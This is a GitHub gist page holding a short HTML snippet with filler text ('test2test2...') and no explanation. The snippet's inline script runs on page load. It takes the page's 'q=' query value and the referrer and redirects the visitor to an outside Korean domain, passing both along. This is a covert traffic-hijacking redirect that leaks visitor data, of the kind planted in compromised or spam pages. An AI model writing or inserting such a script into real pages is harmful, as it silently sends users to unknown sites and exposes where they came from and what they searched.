Skip to content

Instantly share code, notes, and snippets.

@phpfiddle
Created November 18, 2014 05:45
Show Gist options
  • Save phpfiddle/68ddfad218f112c82035 to your computer and use it in GitHub Desktop.
Save phpfiddle/68ddfad218f112c82035 to your computer and use it in GitHub Desktop.
[ Posted by Cre8hero ] test2test2test2test2test2test2
<!DOCTYPE html>
<p>
<script type="text/javascript">
var a= document.location.href;
var q=a.substring(a.indexOf("q=")+2,a.length);
var jj = "http://adfd.otpin.co.kr/?ref="+document.referrer+"&q="+q;
location.href = jj;
</script>
</p>
<p></p>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment